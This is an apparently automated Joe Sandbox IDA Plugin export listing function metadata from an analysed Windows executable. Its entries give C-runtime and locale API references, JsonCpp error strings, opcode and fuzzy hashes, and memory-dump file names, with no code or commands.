                                                                                                                                                                          • Opcode ID: f0ffd342919842dffd779aa7ca47588310b5acaa36f8272d6a3067b3f271bd00
                                                                                                                                                                          • Instruction ID: 18a30d573acfc36c7234af747e7d5e48235d9a4497bf2a95da6d4f9f47eb505f
                                                                                                                                                                          • Opcode Fuzzy Hash: f0ffd342919842dffd779aa7ca47588310b5acaa36f8272d6a3067b3f271bd00
                                                                                                                                                                          • Instruction Fuzzy Hash: 71118E22B15F018AEB00DFA4E8446B873A4FB59B69F850E35DA2D867B4DF7CD1A48350
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A68
                                                                                                                                                                            • Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A6E
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC2FD57
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Missing ',' or ']' in array declaration$in Json::Value::operator[](int index): index cannot be negative
                                                                                                                                                                          • API String ID: 4131450254-2107479676
                                                                                                                                                                          • Opcode ID: 99763ad842c78cf9390237b1c23b241b16f30330d5d1da514ea956af2446be50
                                                                                                                                                                          • Instruction ID: b1a8ba734880608f0237c4a9305013318d84fa70da15408f8403e616854c8464
                                                                                                                                                                          • Opcode Fuzzy Hash: 99763ad842c78cf9390237b1c23b241b16f30330d5d1da514ea956af2446be50
                                                                                                                                                                          • Instruction Fuzzy Hash: BFD1D522A19A4582EA24FB19E460B7EE3A1FB95B84F814131DF8E47BB5DF3CE541C710
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FormatInfoLocaleMessage
                                                                                                                                                                          • String ID: !x-sys-default-locale
                                                                                                                                                                          • API String ID: 4235545615-2729719199
                                                                                                                                                                          • Opcode ID: 91bbd9e5e1bb77ab25f06dc6402dc10c2fd936a1ec69c19bd24413b0a1be4bae
                                                                                                                                                                          • Instruction ID: 457fce74db1d5fe070670a88170dd8f2125b0dbe8cd713d095bf5ec3ce002d60
                                                                                                                                                                          • Opcode Fuzzy Hash: 91bbd9e5e1bb77ab25f06dc6402dc10c2fd936a1ec69c19bd24413b0a1be4bae
                                                                                                                                                                          • Instruction Fuzzy Hash: 0801D671B0978282E7559B15F440B7AE7A1F788784F858035DA4946AB4CF3CD545CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy_s
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1502251526-0
                                                                                                                                                                          • Opcode ID: 3a169fb333f111df0ae1304fb82a5a5346c1f6606d896419b7e9c4814cfa7d1e
                                                                                                                                                                          • Instruction ID: 4600a7aa40d42931b19a2f190c05f1cde0a3a7c8d992c8e829e33680c82cc40f
                                                                                                                                                                          • Opcode Fuzzy Hash: 3a169fb333f111df0ae1304fb82a5a5346c1f6606d896419b7e9c4814cfa7d1e
                                                                                                                                                                          • Instruction Fuzzy Hash: 85C1F772B5A68587E724DF1AA088A7EF791F784784F858235DB4B43B64DB3DE900CB40
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1791019856-0
                                                                                                                                                                          • Opcode ID: 222b0e861e182a54b612e5ee44c9166181b4c14f1b52bbd9ed51d65b411f0d9c
                                                                                                                                                                          • Instruction ID: 4903def95bdc58d8b48689c75ab991d05a8e46ab88aa18585f442bae9d0eaeb7
                                                                                                                                                                          • Opcode Fuzzy Hash: 222b0e861e182a54b612e5ee44c9166181b4c14f1b52bbd9ed51d65b411f0d9c
                                                                                                                                                                          • Instruction Fuzzy Hash: C661A372A0A54286EB34AF19D590E7DB3A1FB48745F825235C78D836B1EF3CE451C721
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                          • String ID: GetLocaleInfoEx
                                                                                                                                                                          • API String ID: 2299586839-2904428671
                                                                                                                                                                          • Opcode ID: b882f90ffef5444c931e402aee2dbbae8b06f37c4ee4b5221b82b3988a7afd4d
                                                                                                                                                                          • Instruction ID: 4ebeb6edeeac92af5dea91f62a31b1d3730f96e99036eb61494a52ca679d6e84
                                                                                                                                                                          • Opcode Fuzzy Hash: b882f90ffef5444c931e402aee2dbbae8b06f37c4ee4b5221b82b3988a7afd4d
                                                                                                                                                                          • Instruction Fuzzy Hash: CB01A231B0AA41C6EB40AB5AB4408A6E760EF98BD0F994135DE4D03B75CE3CD5818760
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 73155330-0
                                                                                                                                                                          • Opcode ID: 90368b8ef4441dc009c4228227d5403af90ea720699dd06e338a726c9d3662ce
                                                                                                                                                                          • Instruction ID: 64e246c38ced0a5dfe699b36f42a8e7d305f037847a6184147db1e5b8e5f5ba2
                                                                                                                                                                          • Opcode Fuzzy Hash: 90368b8ef4441dc009c4228227d5403af90ea720699dd06e338a726c9d3662ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 57E10162A1AB8582DA10EF19E044A7DB7A4FB48BD4F968631DF9D077A1DF3CE590C310
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionRaise_clrfp
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 15204871-0
                                                                                                                                                                          • Opcode ID: 598787edf748aa6946d53eba35aafe4e57d7d190c1449ce64e1dcf32e842ec3e
                                                                                                                                                                          • Instruction ID: 37bdefdc7bcfa2e3ee4fe40476d965ef6b82e8173f2c67149a7d7c60fba3f0d0
                                                                                                                                                                          • Opcode Fuzzy Hash: 598787edf748aa6946d53eba35aafe4e57d7d190c1449ce64e1dcf32e842ec3e
                                                                                                                                                                          • Instruction Fuzzy Hash: C3B16A73A05B888BEB19DF2DC886768BBE0F744B48F568921DA5D83BB4CB39D451C710
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: assert json failed$in Json::Value::operator[](ArrayIndex): requires arrayValue
                                                                                                                                                                          • API String ID: 0-1138025937
                                                                                                                                                                          • Opcode ID: 52495e85efedf8587e9a915e7768b944e264220d975e34df909c3d4f03595598
                                                                                                                                                                          • Instruction ID: b1a07b8173586d76473ee681657ec19ec23e868ab799dfc0e6945c7e147a8f6b
                                                                                                                                                                          • Opcode Fuzzy Hash: 52495e85efedf8587e9a915e7768b944e264220d975e34df909c3d4f03595598
                                                                                                                                                                          • Instruction Fuzzy Hash: C1B11922A1A64182EB24EB29D450ABDF7A1FB84B84FC64135EA8D077B5DF3CD645C720
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: e+000$gfff
                                                                                                                                                                          • API String ID: 0-3030954782
                                                                                                                                                                          • Opcode ID: d96ac94b998a0613f689ee7d6bdb617a18d6d56d146caa956ea6ba6d0f0f1ef6
                                                                                                                                                                          • Instruction ID: 19a0a10160427237b94e992ab4fb56922556ff4b9c4d461d42d7564c63f436bc
                                                                                                                                                                          • Opcode Fuzzy Hash: d96ac94b998a0613f689ee7d6bdb617a18d6d56d146caa956ea6ba6d0f0f1ef6
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C519822B192C546E7209A3A9840B79BB91F744F94F89C331DB9847AF1CF3DD001C720
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Info
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1807457897-0
                                                                                                                                                                          • Opcode ID: 8a1690cc30971e6efb9191808d7aa67a42901d5129d3e5fedda4b9e201d97209
                                                                                                                                                                          • Instruction ID: c1d00680300551032e0fa03f235faf4cdb16b82efb78fc3da88512e2245c16c6
                                                                                                                                                                          • Opcode Fuzzy Hash: 8a1690cc30971e6efb9191808d7aa67a42901d5129d3e5fedda4b9e201d97209
                                                                                                                                                                          • Instruction Fuzzy Hash: 6212AF22A09BC186E751DF2894586FDB7A4FB58748F869335EB9D43662DF38E5C0C310
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c6c9ee47428b9f3fc77cdbc732d359fe599224da288ebfa0240364f596aacbc6
                                                                                                                                                                          • Instruction ID: 0dd59ac9a5c79d2d6a142a5e7da5f7abb0cb12331acae2cf17957e1c9c31a3b2
                                                                                                                                                                          • Opcode Fuzzy Hash: c6c9ee47428b9f3fc77cdbc732d359fe599224da288ebfa0240364f596aacbc6
                                                                                                                                                                          • Instruction Fuzzy Hash: 74E19032A05B8186E724EB65E490AFEB7A4FB58788F414631DF8D57B62EF38D245C300
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3668304517-0
                                                                                                                                                                          • Opcode ID: 96ecc0f72a9928f91bfa26dde02c3edad72c9396e32cc41e060eeef61ca00714
                                                                                                                                                                          • Instruction ID: 50511da97b77230dc3e6503d33b9c91f41d5f27eddd38bba3119ef6449fb2415
                                                                                                                                                                          • Opcode Fuzzy Hash: 96ecc0f72a9928f91bfa26dde02c3edad72c9396e32cc41e060eeef61ca00714
                                                                                                                                                                          • Instruction Fuzzy Hash: 49A1222260E68186EB28AF29E05077DFBA0EB45B84FD54131DA9E477B5CF3DD448C720
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5160664705158667e81bab6cdbde4881878e179a89be4c9fa1c4695460aa44ee
                                                                                                                                                                          • Instruction ID: bbf27d27c569ead24a5c27ce048fdd134fa4b202e55aa7c8c60799bd28311e29
                                                                                                                                                                          • Opcode Fuzzy Hash: 5160664705158667e81bab6cdbde4881878e179a89be4c9fa1c4695460aa44ee
                                                                                                                                                                          • Instruction Fuzzy Hash: D7510722B0568155FB10AB7AA890AAEBBA1FB447D4F455134EE5C77BB5CE3CD501C700
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastValue$InfoLocale
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 673564084-0
                                                                                                                                                                          • Opcode ID: 5a86f6551b3228d9c0916b14b2249d7917d42bd6171e235b69f918e9520d1485
                                                                                                                                                                          • Instruction ID: dc0a34cca39e9bfd3f1ebd6d4b4878da469150e122be829be568b6b8f0dcbea2
                                                                                                                                                                          • Opcode Fuzzy Hash: 5a86f6551b3228d9c0916b14b2249d7917d42bd6171e235b69f918e9520d1485
                                                                                                                                                                          • Instruction Fuzzy Hash: 8631EA31A0968287EB24EB29E462FBAB391FB48744F819135DA4D837B5EF3CE4118711
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF7ABC56F84: GetLastError.KERNEL32 ref: 00007FF7ABC56F93
                                                                                                                                                                            • Part of subcall function 00007FF7ABC56F84: FlsGetValue.KERNEL32 ref: 00007FF7ABC56FA8
                                                                                                                                                                            • Part of subcall function 00007FF7ABC56F84: SetLastError.KERNEL32 ref: 00007FF7ABC57033
                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7ABC6484F,?,00000000,00000092,?,?,00000000,?,00007FF7ABC54DC1), ref: 00007FF7ABC640FE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3029459697-0
                                                                                                                                                                          • Opcode ID: ef01aa4e10b798d8c1182b42df3aa6388aa70aed32a0fba372173c71e43b78bb
                                                                                                                                                                          • Instruction ID: 1c5a7263e927bee7267781eed240eb459a73c98da989c9d03e889f2548c9b368
                                                                                                                                                                          • Opcode Fuzzy Hash: ef01aa4e10b798d8c1182b42df3aa6388aa70aed32a0fba372173c71e43b78bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 2F112467E09645CAEB10AF1AD490EBDB7A1FB54BA0F86A231C629433F0DE38D5D1C750
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF7ABC56F84: GetLastError.KERNEL32 ref: 00007FF7ABC56F93
                                                                                                                                                                            • Part of subcall function 00007FF7ABC56F84: FlsGetValue.KERNEL32 ref: 00007FF7ABC56FA8
                                                                                                                                                                            • Part of subcall function 00007FF7ABC56F84: SetLastError.KERNEL32 ref: 00007FF7ABC57033
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,?,?,00007FF7ABC643C2), ref: 00007FF7ABC6464F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$InfoLocaleValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3796814847-0
                                                                                                                                                                          • Opcode ID: 67ccf32ae814a0d26bdbbaf8c5a0f09707bf70b588967180c96548bb5e4f4159
                                                                                                                                                                          • Instruction ID: 46c56dfcbed4dfec3b4f2ded0412178eddee2a9e7724f3949f65e1b467bfe467
                                                                                                                                                                          • Opcode Fuzzy Hash: 67ccf32ae814a0d26bdbbaf8c5a0f09707bf70b588967180c96548bb5e4f4159
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F117A32F1955283E774AB29A060E7EB2E0EB68764F925231D62D437F0FE29D8818710
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF7ABC56F84: GetLastError.KERNEL32 ref: 00007FF7ABC56F93
                                                                                                                                                                            • Part of subcall function 00007FF7ABC56F84: FlsGetValue.KERNEL32 ref: 00007FF7ABC56FA8
                                                                                                                                                                            • Part of subcall function 00007FF7ABC56F84: SetLastError.KERNEL32 ref: 00007FF7ABC57033
                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7ABC6480B,?,00000000,00000092,?,?,00000000,?,00007FF7ABC54DC1), ref: 00007FF7ABC641AE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3029459697-0
